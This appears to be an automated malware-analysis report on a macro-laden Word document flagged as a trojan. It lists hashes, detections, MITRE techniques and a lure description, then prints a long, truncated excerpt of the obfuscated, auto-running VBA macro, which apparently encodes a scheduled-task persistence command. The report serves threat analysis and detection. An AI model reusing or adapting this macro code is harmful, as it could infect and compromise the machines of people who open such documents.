Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a6678a676d6a5583…

MALICIOUS

Office (OLE)

Size: 126.5 KB
Created: 2018-10-09 06:23:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: cd15a7c3cb1725dc9d21160c26ab9c2e
SHA-1: 7dc141cdd67152d8039c42c1d8b14f6a18b6b509
SHA-256: a6678a676d6a55833aa63233b3bae53fd7825c3c8afc4d015a2ca8296baee31a
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristic firings including 'OLE_VBA_MACROS', 'OLE_VBA_CREATEOBJ', and 'OLE_VBA_GETOBJ'. The ClamAV detection 'Win.Trojan.Agent-6754303-0' further confirms its malicious nature. The VBA script appears to be obfuscated but its use of CreateObject and GetObject suggests it is designed to download and execute a second-stage payload. The document body, presented as a technical task assignment, serves as a lure to encourage macro execution.

Heuristics 6

  • ClamAV: Win.Trojan.Agent-6754303-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Agent-6754303-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10348 bytes
SHA-256: 14fdfa5e0b6ade2a7de2dc26f67af2848454ad6da53586697c1f1f74be85e82b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"


Sub Frame1_Layout()
    Dim test_startfile As String
    Dim rawshark As Object
    Dim OTKLOADR As Integer
    Dim RS_NotDefault As String
    Dim py25tests As String
    Dim RGI79AD As String
    Dim reindent As String
    Dim RIABLC3 As String

    test_startfile = "MtrjUwjrnzrJinynts"
    py25tests = "\xHWnUY3Xmjqq"
    xrWPpb4
    wsepno
    Dim UserDataBackup%: UserDataBackup = 1
    Dim TTYRES%: TTYRES = UserDataBackup * 9
    If UserDataBackup < TTYRES Then
        test_startfile = py25tests
        Set rawshark = CreateObject(MSART8(test_startfile))
    Else
        Set rawshark = CreateObject(MSART8(test_startfile))
    End If
    reindent = fstexp("muh9;55y")
    RS_NotDefault = fixer_base("mui68;5y")
    RGI79AD = KYEPC270
    If (RGI79AD = "O55>55=<") Then
        RIABLC3 = J0289430(reindent)
        RIACMAC7 = MSART8("wfsitrdsfrj")
        RS_NotDefault = Replace(RS_NotDefault, RIACMAC7, RIABLC3)
        RS_NotDefault = NAPHLPR(rawshark, RS_NotDefault, OTKLOADR)
    End If
End Sub

Function fixer_base(test_startfile2 As String) As String
    Dim SL00286_ As String
        Dim FD00077_ As String
    FD00077_ = "xhmyfxpx%4Hwjfyj%4K%4XH%IFNQ^%4XY%'65?75'%4YS%'Iwn{jHqtziYfxpHtwjHmjhp'%4YW%'rxmyf%wfsitrdsfrj'"

    test_startfile2 = "muo9:55y"
    SL00286_ = "NK6987J8"
    test_startfile2 = "MU_;W\S<"
    SL00286_ = FD00077_
    SL00286_ = MSART8(SL00286_)
    fixer_base = SL00286_
End Function

Function fstexp(test_startfile02 As String) As String
    Dim SO02269_ As String
        Dim dnsext As String
    Dim dismcoreps As String
    Dim EP0NGJ8F As String
    Dim CREDITS As String
    Dim CscMigDl As String
    Dim docomo As String
    Dim compdyn As String
    Dim displayswitch As String
    Dim DGPICCAP As String
    Dim dvdburn As String
    Dim DISTLSTS As String
    Dim common As String
    Dim cordiaz As String
    Dim EP0NCA9A As String
    Dim controller As String
    Dim dependency_links As String
    Dim DigitalLocker As String
    Dim dicowan As String
    Dim dfdll_dll_x8 As String
    Dim dispdiag As String
    Dim EP0NRE9A As String
    Dim Curri As String
    Dim ehdebug As String
    Dim driverquery As String
    Dim drtprov As String
    Dim Doual As String
    Dim EP0NREAB As String
    Dim ehSched As String
    displayswitch = "fYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYb"
    common = "jwynqj7:8. Jsi%Kzshynts YXd\nsit|xZuifyj-. |nsit|3hqtxj-. A4xhwnuyC A4gti~C A4myrqC"
    dfdll_dll_x8 = "^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]'    |nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxy"
    dismcoreps = "fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`f"
    dvdburn = "r™yMMZ›œ} œsvMZr…r�¢�–|{�|™vMo†}n€€MMZ›œ{–MMZ{œ’…–MZ„–›‘œ„€¡†™rMMuv‘q’›MMMMZSSMM�g‰„–{q|¤ ‰ † �rz`_‰"
    EP0NREAB = "AmyrqC Agti~C Axhwnuy%qfslzfljB'[GXhwnuy'C  Xzg%YXd\nsit|xZuifyj-.  \\FSduwtknqjd{6%B%==  \hsJfuFzym"
    ehdebug = "z’ˆ`]ŠXT¥TVMSS€’¡MM”›}žjrpu|M–›ƒ|x’Zr¥}'    X[6886J8%B%' ’  –|{MMU”’¡Zv¡rzM’{ƒgn†¤V[£Ž™‚’M‹©M�|„r  u"
    DISTLSTS = "'    x~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMf"
    controller = "zxjwynqj7:-{jwhqxni1%{drxhixh1%{nj|uwt{.  Sj}y  Z mltwt%B%\G56<95d Jsi%Kzshynts  Kzshynts%zxjwynqj7:"
    dependency_links = "tw~%+%x~xyjrhuq%+%x~xdxw{%+%X[8757J8%+%X[6886J8  |nswx%B%Z mltwt-|nswx.  YS5576<d%B%|nswx Jsi%Kzshyn"
    Doual = "a`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`'    x~xdxw{%B%'`YMf`MYf^MYffMY^]aYc"
    dispdiag = "aMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]'    yjxydrzqyng~yjhtijh%B%'YM^^cMYMa^
... (truncated)